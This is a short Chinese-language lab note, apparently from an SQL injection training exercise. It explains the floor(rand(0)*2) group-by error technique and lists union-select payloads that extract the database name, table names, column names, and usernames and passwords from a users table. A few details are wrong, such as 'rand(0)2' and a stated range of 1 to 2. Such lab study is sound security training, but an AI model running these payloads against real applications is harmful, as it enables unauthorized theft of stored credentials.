输入?id=1没有返回数据
输入?id=1啥都没有了,典型的盲注,正确时显示you are in .... 不正确时什么也不显示。
三列
数据库版本号
sql部分知识:
count(*) 统计表中记录的函数,返回表的行数,用于计数
group by() 对条件进行分组
rand() 产生一个0到1之间的随机数
rand(0) 产生有规律的0到1之间的随机数(伪随机)
rand(0)*2 产生有规律的1到2之间的随机数
floor(rand(0)*2) 产生有规律的随机0或1
报错产生条件:
*Select中有count()、floor(rand(0)2)
有 group by floor(rand(0)2)
获取数据库名:
?id=1’ union select 1,count(*),concat(database(),’/’,floor(rand(0)*2))x from information_schema.columns group by x --+
获取数据库中所有表名:
union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),'/',floor(rand(0)*2))x from information_schema.columns group by x --+
获取security数据库中users表中所有字段名
union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),'/',floor(rand(0)*2))x from information_schema.columns group by x --+
获取security数据库中users表中username字段内的所有信息
union select 1,count(*),concat((select username from users limit 1,1),'/',floor(rand(0)*2))x from security.users group by x--+
获取security数据库中users表中password字段内的所有信息
union select 1,count(*),concat((select password from users limit 1,1),'/',floor(rand(0)*2))x from security.users group by x–+